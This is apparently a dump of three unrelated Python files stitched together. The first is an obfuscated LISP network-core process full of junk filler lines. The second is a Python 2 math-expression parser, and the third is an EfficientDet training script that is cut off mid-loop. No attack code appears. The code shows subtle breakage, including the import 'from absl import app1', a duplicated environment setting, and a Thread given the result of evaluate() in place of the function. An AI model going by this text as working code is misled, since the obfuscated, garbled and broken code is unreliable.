I111iI = I111iI . split ( "\n" )
for OooOO in I111iI :
Oo0O0oooo . write ( OooOO + "\n" )
if ( OooOO [ 0 ] == "#" and OooOO [ - 1 ] == "#" and len ( OooOO ) >= 4 ) :
o0oO = OooOO [ 1 : - 2 ]
ooOo0 = len ( o0oO ) * "-"
if ( o0oO == ooOo0 ) : break
if 61 - 61: II111iiii
if 48 - 48: OOooOOo
Oo0O0oooo . close ( )
return
if 26 - 26: iII111i * I1Ii111 * oO0o * OoOoOO00
if 48 - 48: iII111i % i11iIiiIii . OoooooooOO * IiII % OoO0O00 . iII111i
if 6 - 6: O0 . ooOoO0o - oO0o / i11iIiiIii
if 84 - 84: I11i / I1ii11iIi11i * o0oOOo0O0Ooo * OoO0O00 * OOooOOo * O0
if 83 - 83: O0 % II111iiii + o0oOOo0O0Ooo / OoooooooOO
if 75 - 75: II111iiii . I1IiiI + OOooOOo - OoOoOO00 - O0 . I11i
if 19 - 19: Ii1I * i1IIi % O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
def Ii1iIIII1i ( bottle_port ) :
global Oo0o
global Ii1iI
global Oo
global I1Ii11I1Ii1i
global Ooo
global o0oOoO00o
if 84 - 84: i1IIi - I1IiiI % iII111i
lisp . lisp_i_am ( "core" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "core-process starting up" )
lisp . lisp_uptime = lisp . lisp_get_timestamp ( )
lisp . lisp_version = commands . getoutput ( "cat lisp-version.txt" )
Oo0o = commands . getoutput ( "cat lisp-build-date.txt" )
if 80 - 80: o0oOOo0O0Ooo % iII111i
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i . oO0o
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 87 - 87: OoO0O00
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
lisp . lisp_ipc_lock = multiprocessing . Lock ( )
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
if 65 - 65: OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
if ( os . path . exists ( "lisp.py" ) ) : lisp . lisp_version += "+"
if 83 - 83: ooOoO0o
if 43 - 43: OOooOOo
if 84 - 84: OOooOOo . IiII . iII111i
if 2 - 2: Oo0Ooo - OoOoOO00
if 49 - 49: Ii1I + II111iiii / oO0o - OoOoOO00 % OoOoOO00 + I1IiiI
if 54 - 54: ooOoO0o % Oo0Ooo - OOooOOo
iIi11IiiiII11 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
if ( os . getenv ( "LISP_ANYCAST_MR" ) == None or lisp . lisp_myrlocs [ 0 ] == None ) :
Ii1iI = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
else :
iIi11IiiiII11 = lisp . lisp_myrlocs [ 0 ] . print_address_no_iid ( )
Ii1iI = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
if 26 - 26: iII111i / OoooooooOO - Oo0Ooo
lisp . lprint ( "Listen on {}, port 4342" . format ( iIi11IiiiII11 ) )
if 2 - 2: I1ii11iIi11i - Oo0Ooo
if 4 - 4: O0 / I11i . OoO0O00 - ooOoO0o / OOooOOo
if 25 - 25: I11i * OoOoOO00 - Oo0Ooo . ooOoO0o . oO0o
if 89 - 89: O0 * I11i * OoO0O00
if 3 - 3: OOooOOo / iII111i * iIii1I11I1II1 + II111iiii / o0oOOo0O0Ooo / IiII
if 25 - 25: OoOoOO00 + OoO0O00 % Ii1I % OOooOOo / oO0o
if ( lisp . lisp_external_data_plane ( ) == False ) :
o0oOoO00o = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_DATA_PORT ) )
lisp . lprint ( "Listen on {}, port 4341" . format ( iIi11IiiiII11 ) )
if 91 - 91: OoO0O00 / OoO0O00 . II111iiii . ooOoO0o - I1IiiI
if 23 - 23: I1IiiI
if 7 - 7: iII111i % I1ii11iIi11i
if 64 - 64: I1Ii111 + i11iIiiIii
if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
if 68 - 68: IiII . ooOoO0o
Oo = lisp . lisp_open_send_socket ( "lisp-core" , "" )
Oo . settimeout ( 3 )
if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
if 85 - 85: i1IIi
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( "" , "lisp-core-pkt" )
if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
Ooo = [ Ii1iI , Ii1iI ,
Oo ]
if 54 - 54: OoOoOO00 * iII111i + OoO0O00
if 93 - 93: o0oOOo0O0Ooo / I1IiiI
if 47 - 47: Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
threading . Thread ( target = oo00oO ,
args = [ I1Ii11I1Ii1i , Ooo ] ) . start ( )
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
if 47 - 47: ooOoO0o - Ii1I
if 98 - 98: oO0o . I1Ii111 / OoOoOO00 . ooOoO0o
if 1 - 1: OOooOOo
if 87 - 87: O0 * II111iiii + iIii1I11I1II1 % oO0o % i11iIiiIii - OoOoOO00
if ( os . path . exists ( "./lisp.config" ) == False ) :
lisp . lprint ( ( "./lisp.config does not exist, creating a copy " + "from lisp.config.example" ) )
if 73 - 73: iII111i + Ii1I
iI11I ( )
if 37 - 37: oO0o - iIii1I11I1II1 + II111iiii . Ii1I % iIii1I11I1II1
if 17 - 17: I1Ii111 + i1IIi % O0
if 65 - 65: IiII
if 50 - 50: II111iiii / OoO0O00
if 79 - 79: I1ii11iIi11i - iIii1I11I1II1 % i1IIi / Oo0Ooo + II111iiii
if 95 - 95: oO0o
i11ii ( Ii1iI )
if 39 - 39: i1IIi . I1ii11iIi11i / I11i / I11i
threading . Thread ( target = lispconfig . lisp_config_process ,
args = [ Oo ] ) . start ( )
if 100 - 100: OoooooooOO - OoooooooOO + IiII
if 32 - 32: OoOoOO00 * o0oOOo0O0Ooo / OoooooooOO
if 90 - 90: I1Ii111
if 35 - 35: II111iiii / Ii1I
threading . Thread ( target = oOooOoOOo0O ,
args = [ bottle_port ] ) . start ( )
threading . Thread ( target = o00OIIIIIiiI , args = [ ] ) . start ( )
if 79 - 79: OoOoOO00 + I1Ii111 * iII111i * Ii1I
if 53 - 53: OOooOOo / Oo0Ooo
if 10 - 10: I1ii11iIi11i . o0oOOo0O0Ooo
if 75 - 75: O0 * i1IIi - I11i / OOooOOo % OOooOOo / OoOoOO00
threading . Thread ( target = O00Oo00OOoO0 ,
args = [ Oo ] ) . start ( )
if 5 - 5: O0 - iII111i / I1Ii111 . o0oOOo0O0Ooo
if 7 - 7: I1ii11iIi11i - OoOoOO00
if 54 - 54: oO0o / iIii1I11I1II1 / OoooooooOO . i1IIi - OoOoOO00
if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
threading . Thread ( target = Ii1i ) . start ( )
return ( True )
if 46 - 46: Ii1I
if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
if 87 - 87: I1ii11iIi11i / I1IiiI
if 45 - 45: OoOoOO00 * ooOoO0o / OoooooooOO + OoO0O00 . I1Ii111 / OoO0O00
if 64 - 64: Ii1I / i1IIi % I1IiiI - o0oOOo0O0Ooo
if 11 - 11: I1ii11iIi11i - OoooooooOO
if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
def I1iiII1 ( ) :
if 45 - 45: OoO0O00 + OoO0O00 % ooOoO0o
if 36 - 36: Ii1I * I11i . I11i / Oo0Ooo / I1IiiI
if 80 - 80: OoooooooOO - i1IIi
if 51 - 51: i1IIi . OoOoOO00 / OoOoOO00 % i11iIiiIii * OOooOOo - I1Ii111
lisp . lisp_close_socket ( Oo , "lisp-core" )
lisp . lisp_close_socket ( I1Ii11I1Ii1i , "lisp-core-pkt" )
lisp . lisp_close_socket ( Ii1iI , "" )
lisp . lisp_close_socket ( o0oOoO00o , "" )
return
if 49 - 49: Oo0Ooo - iIii1I11I1II1
if 64 - 64: I1Ii111 + iIii1I11I1II1
if 14 - 14: Ii1I / OoooooooOO + II111iiii . O0 / i1IIi
if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
if 12 - 12: OoOoOO00 + o0oOOo0O0Ooo . I1Ii111
if 52 - 52: OoO0O00
if 4 - 4: Ii1I % I1ii11iIi11i + I11i - I1ii11iIi11i
if 98 - 98: Ii1I - O0 * oO0o * Ii1I * Ii1I
if 44 - 44: IiII + I11i
if 66 - 66: oO0o
if 34 - 34: iII111i % i11iIiiIii + i11iIiiIii - iII111i
def i11ii ( lisp_socket ) :
if 2 - 2: II111iiii + i1IIi
Oo0O0oooo = open ( "./lisp.config" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
I111iI = I111iI . split ( "\n" )
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
if 94 - 94: iIii1I11I1II1 + IiII
II11II = False
for OooOO in I111iI :
if ( OooOO [ 0 : 1 ] == "#-" and OooOO [ - 2 : - 1 ] == "-#" ) : break
if ( OooOO == "" or OooOO [ 0 ] == "#" ) : continue
if ( OooOO . find ( "decentralized-push-xtr = yes" ) == - 1 ) : continue
II11II = True
break
if 40 - 40: iII111i + O0
if ( II11II == False ) : return
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
Ii1 = [ ]
o0OOOoo0000 = False
for OooOO in I111iI :
if ( OooOO [ 0 : 1 ] == "#-" and OooOO [ - 2 : - 1 ] == "-#" ) : break
if ( OooOO == "" or OooOO [ 0 ] == "#" ) : continue
if 19 - 19: OoooooooOO . I1IiiI + I1Ii111 - I1IiiI / I1IiiI % IiII
if ( OooOO . find ( "lisp map-server" ) != - 1 ) :
o0OOOoo0000 = True
continue
if 4 - 4: i11iIiiIii * I1ii11iIi11i + OoooooooOO - IiII . ooOoO0o . iIii1I11I1II1
if ( OooOO [ 0 ] == "}" ) :
o0OOOoo0000 = False
continue
if 48 - 48: o0oOOo0O0Ooo * oO0o . I1IiiI - I1Ii111 + OOooOOo . Oo0Ooo
if 62 - 62: I11i + OoooooooOO * iIii1I11I1II1 / i1IIi * O0
if 10 - 10: iIii1I11I1II1 * OoooooooOO / OOooOOo
if 33 - 33: o0oOOo0O0Ooo % IiII - iIii1I11I1II1 % OOooOOo + I1Ii111 - i11iIiiIii
if 91 - 91: OoooooooOO . iIii1I11I1II1 / i11iIiiIii
if ( o0OOOoo0000 and OooOO . find ( "address = " ) != - 1 ) :
oOOOO = OooOO . split ( "address = " ) [ 1 ]
OoOOoo0 = int ( oOOOO . split ( "." ) [ 0 ] )
if ( OoOOoo0 >= 224 and OoOOoo0 < 240 ) : Ii1 . append ( oOOOO )
if 93 - 93: II111iiii * OoOoOO00 % o0oOOo0O0Ooo
if 67 - 67: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o - i1IIi . OoOoOO00
if ( oOOOO == [ ] ) : return
if 12 - 12: IiII / OoO0O00 / O0 * IiII
if 51 - 51: ooOoO0o * iII111i / i1IIi
if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
II1i111 = commands . getoutput ( 'ifconfig eth0 | egrep "inet "' )
if ( II1i111 == "" ) : return
oO0o00o000Oo0 = II1i111 . split ( ) [ 1 ]
if 1 - 1: I1IiiI - I1Ii111
if 62 - 62: OoO0O00 . iII111i . iII111i % i1IIi * oO0o % Oo0Ooo
if 20 - 20: ooOoO0o . IiII / I11i . OoooooooOO * OOooOOo + Ii1I
if 2 - 2: I1IiiI
I1i111iiIIIi = socket . inet_aton ( oO0o00o000Oo0 )
for oOOOO in Ii1 :
lisp_socket . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_IF , I1i111iiIIIi )
IIii1Ii = socket . inet_aton ( oOOOO ) + I1i111iiIIIi
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_ADD_MEMBERSHIP , IIii1Ii )
lisp . lprint ( "Setting multicast listen socket for group {}" . format ( oOOOO ) )
if 98 - 98: II111iiii + Oo0Ooo * iIii1I11I1II1 * I1ii11iIi11i + OOooOOo * Ii1I
if 76 - 76: ooOoO0o . oO0o
return
if 60 - 60: OOooOOo * ooOoO0o * OoO0O00
if 64 - 64: I11i / II111iiii / OoO0O00 - ooOoO0o * iIii1I11I1II1 . iII111i
if 25 - 25: OOooOOo - Ii1I . I11i
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
III1I11II11I = int ( sys . argv [ 1 ] ) if ( len ( sys . argv ) > 1 ) else 8080
if 78 - 78: I1ii11iIi11i . I1Ii111 . I1Ii111 . I11i % iII111i
if 26 - 26: ooOoO0o + OoO0O00 / OoOoOO00 . II111iiii * Ii1I
if 21 - 21: I1IiiI - I1IiiI + iII111i % I1IiiI * oO0o
if 74 - 74: iII111i / I11i . I1IiiI - OoooooooOO + II111iiii + I11i
if ( Ii1iIIII1i ( III1I11II11I ) == False ) :
lisp . lprint ( "lisp_core_startup() failed" )
lisp . lisp_print_banner ( "lisp-core abnormal exit" )
exit ( 1 )
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
while ( True ) :
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
if 9 - 9: i11iIiiIii + OOooOOo - OoOoOO00 / ooOoO0o % i1IIi / oO0o
if 22 - 22: i1IIi
if 3 - 3: OoO0O00 * I1ii11iIi11i - iII111i + I1ii11iIi11i
if 63 - 63: I11i * ooOoO0o % II111iiii % I1Ii111 + I1IiiI * Oo0Ooo
iIii , ooo0O , oOoO0o00OO0 , Oo000 = lisp . lisp_receive ( Ii1iI , False )
if 96 - 96: IiII
if ( ooo0O == "" ) : break
if 99 - 99: iIii1I11I1II1 - ooOoO0o
if 79 - 79: I1IiiI + oO0o % I11i % oO0o
if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
ooo0O = lisp . lisp_convert_6to4 ( ooo0O )
oooO0o ( Ooo , ooo0O , oOoO0o00OO0 , Oo000 )
if 99 - 99: o0oOOo0O0Ooo + OOooOOo
if 34 - 34: I1Ii111 * o0oOOo0O0Ooo . I1IiiI % i11iIiiIii
I1iiII1 ( )
lisp . lisp_print_banner ( "lisp-core normal exit" )
exit ( 0 )
if 61 - 61: iIii1I11I1II1 + oO0o * I11i - i1IIi % oO0o
if 76 - 76: oO0o / OoOoOO00
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
MathExpression.py | import operator
import numpy as np
import math
import re
import functools
from threading import Thread
def forceReversible(func):
"""Tries reversing the arguments of the two argument function func if the original raises a TypeError"""
@functools.wraps(func)
def wrapper(arg0, arg1):
print "Arg 0: %s\nArg 1: %s" % (str(arg0), str(arg1))
try:
return func(arg0, arg1)
except TypeError:
return func(arg1, arg0)
return wrapper
class MathExpression:
"""A parser for mathematical expressions. Does not depend on any other modules in dataManipulation.
Allows the specification of a list of operators which are used to break down a string, and which are assigned to a
function which takes exactly two arguments through an OrderedDict. Interpretation is done on *every* part of the
expression, thus making it impossible to execute arbitrary code. In order to maintain "safety," the input must
be a single string. Parsing is completed in groups of 3 in the format token + operator + token. This is done
iteratively. Expressions are recursively broken into sub-expressions through
the use of matching parenthesis, and evaluated from the inside out.
Function calls are evaluated in the format func(arg0, arg1...). Kwargs are not supported. A
backup function in the format backup(func, *args) can be specified to handle arguments which are passed to a
function but are of improper type; for instance, using only the first index of an array as arguments
for certain functions, etc.
"""
__author__ = "Thomas Schweich"
@staticmethod
def returnDict(key, value):
return {key: value}
'''
operators = collections.OrderedDict(
(("(", None), (")", None), (",", None), ("^", forceReversible(operator.pow)), ("/", forceReversible(operator.div)),
("*", forceReversible(operator.mul)), ("+", forceReversible(operator.add)), ("-", forceReversible(operator.sub))))
'''
operators = [{"(": None, ")": None, ",": None}, {"^": forceReversible(operator.pow)},
{"/": forceReversible(operator.div), "*": forceReversible(operator.mul)},
{"+": forceReversible(operator.add), "-": forceReversible(operator.sub)}]
modules = (np, math)
def __init__(self, expression, variables=None, operators=operators, modules=modules, fallbackFunc=None):
self.variables = variables if variables is not None else {}
self.operators = operators if operators is not None else MathExpression.operators
self.modules = modules if modules is not None else MathExpression.modules
self.fallbackFunc = fallbackFunc
self.expression = self.genFromString(expression)
self.loops = 0
self.result = None
def genFromString(self, string):
"""Separates string by .operators using regex"""
# operators = self.operators.keys()
operators = [o for d in self.operators for o in d.keys()] # o: operator, d: dict
operators.sort(key=lambda x: -len(x))
exp = re.findall(r'<.*?>|' + "|".join(["%s" % re.escape(op) for op in operators]) + '|[\.\w]+', string)
print exp
return exp
def getEvaluationThread(self):
"""Returns a Thread who's target is evaluate() which can be started and joined at your leisure"""
return Thread(target=self.evaluate())
def evaluate(self):
"""Calls evaluateExpression() on .expression"""
self.expression = self.evaluateExpression(self.expression)
def evaluateExpression(self, exp):
"""Recursively evaluates expressions starting with innermost parenthesis, working outwards
Iteratively solves sub-expressions (grouped by parenthesis) in the order of .operators
"""
try:
isCompleteExp = len(exp) >= 3
except TypeError:
isCompleteExp = False
if isCompleteExp:
print "-New Starting expression: %s" % str(exp)
rightInner = exp.index(")") if ")" in exp else len(exp)
print "Right inner parenthesis index: %d" % rightInner
leftSide = exp[:rightInner]
leftInner = len(leftSide) - leftSide[::-1].index("(") if "(" in leftSide else 0
print "Left inner parenthesis index: %d" % leftInner
subExp = leftSide[leftInner:]
print "Sub Expression: " + str(subExp)
callerIndex = leftInner - 2
allOps = [o for d in self.operators for o in d.keys()]
if callerIndex > -1 and exp[callerIndex] not in allOps:
print "Calling function...."
# Call function if in format something(arg0, arg1...) if "something" is not an operator
args = []
while "," in subExp:
args.append(self.evaluateExpression(list(subExp[:subExp.index(",")])))
del subExp[:subExp.index(",") + 1]
args.append(self.evaluateExpression(subExp))
# kwargs = {}
'''
for i, arg in enumerate(args):
if isinstance(arg, dict):
kwargs.update(args.pop(i))
'''
print "Arguments: " + str(args)
# print "Kwargs: " + str(kwargs)
funcToCall = self._interpret(exp[callerIndex])
try:
result = funcToCall(*args) # , **kwargs)
except:
try:
result = self.fallbackFunc(funcToCall, *args)
except Exception as e:
raise MathExpression.ParseFailure(str(funcToCall), e)
print "Result: " + str(result)
del exp[callerIndex:rightInner + 1]
exp.insert(callerIndex, result)
print "Expression after replacement" + str(exp)
print "....call complete"
else:
print "Evaluating expression...."
# Otherwise, evaluate the expression within the parenthesis, replacing the range with the result
newExp = subExp[:]
for order in self.operators:
for index, part in enumerate(subExp):
self.loops += 1
if part in order.keys(): # Changing to allow for equal level operators ## ch
newLocation = newExp.index(part)
prevIndex = newLocation - 1
nextIndex = newLocation + 1
try:
prev = self._interpret(newExp[prevIndex])
nxt = self._interpret(newExp[nextIndex])
except IndexError as i:
raise MathExpression.ParseFailure(part, i)
print "Combining %s with %s using '%s' operator" % (str(prev), str(nxt), str(part))
if not (isinstance(prev, np.ndarray) and not isinstance(nxt, np.ndarray)):
# Call the function stored in this order's dict under the operator
solution = order[part](prev, nxt)
else:
raise MathExpression.SyntaxError(prev)
print "Solution: " + str(solution)
del newExp[prevIndex:nextIndex + 1]
newExp.insert(prevIndex, solution)
print "After replacement with solution: " + str(newExp)
try:
hasParens = exp[leftInner - 1] == "(" and exp[rightInner] == ")"
except IndexError:
raise MathExpression.SyntaxError(exp)
if len(newExp) == 1:
if hasParens:
print "Replacing parenthesis and expression"
del exp[leftInner - 1:rightInner + 1]
else:
print "Replacing expression only (parenthesis not found)"
del exp[leftInner:rightInner]
exp.insert(leftInner-1, newExp[0])
else:
raise MathExpression.SyntaxError(newExp)
print "New Expression: %s" % str(exp)
print "....evaluate complete"
print "Length of expression: %d" % len(exp)
return self.evaluateExpression(exp)
else:
if not isinstance(exp, list):
print "Loops: %d" % self.loops
self.loops = 0
return exp
elif len(exp) == 1:
return self._interpret(exp[0])
else:
raise MathExpression.SyntaxError(exp)
def _interpret(self, string):
if isinstance(string, str):
if string[0] == "<" and string[-1] == ">":
varString = string[1:-1]
try:
print "Trying interpret %s as variable" % varString
return self.variables[varString]
except KeyError as k:
raise MathExpression.ParseFailure(string, k)
else:
try:
print "Trying interpret %s as float" % string
return float(string)
except ValueError:
pass
for module in self.modules:
try:
print "Trying interpret %s as %s" % (string, str(module))
return getattr(module, string)
except AttributeError:
pass
raise MathExpression.SyntaxError(string)
# return string
else:
return string
'''
def operate(self, operator_, *args):
# TODO Dict kwargs
kwargs = [self._interpret(arg) for arg in args if isinstance(arg, dict)]
args = [self._interpret(arg) for arg in args if not isinstance(arg, dict)]
return operator_(*args, **kwargs)
'''
class ParseFailure(Exception):
"""Represents the expression group (i.e. token + operator + token) and the given exception"""
def __init__(self, badPart, exception):
self.badPart = badPart
self.exception = exception
def __repr__(self):
custom = ""
if self.exception is AttributeError:
custom += "'%s' not found in namespace. \n" % str(self.badPart)
if self.badPart in MathExpression.operators:
custom += "It is likely that the operator was missing an argument. "
return "%s threw error: %s. %s" % (str(self.badPart), str(self.exception), custom)
def __str__(self):
return str(self.__repr__())
class SyntaxError(Exception):
"""Represents only the expression group (i.e. token + operator + token)"""
def __init__(self, badPart):
self.badPart = badPart
def __repr__(self):
custom = ""
if "(" in self.badPart or ")" in self.badPart:
custom += "It is likely that you are missing a parenthesis."
return "Syntax error on sub expression: %s. \n%s" % (str(self.badPart), custom)
def __str__(self):
return str(self.__repr__())
def limit(max_=None):
"""Return decorator that limits allowed returned values."""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
ret = func(*args, **kwargs)
try:
mag = abs(ret)
except TypeError:
pass # not applicable
else:
if mag > max_:
raise ValueError(ret)
return ret
return wrapper
return decorator |
main.py | # Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
from absl import app1
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=2,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 1, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', True,
'This option helps to rectify CPU memory leak. If True, every epoch is '
'run in a separate process for train and eval and memory will be cleared.'
'Drawback: need to kill 2 processes if trainining needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tf.disable_eager_execution()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
# Always enable auto mixed precision graph rewrite
os.environ['TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'] = '1'
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.training_file_pattern is None:
raise RuntimeError('Must specify --training_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.validation_file_pattern is None:
raise RuntimeError('Must specify --validation_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, the meaning of `shard` and `replica` is the
# same; follwing the API, here has mixed use of both.
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array'
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
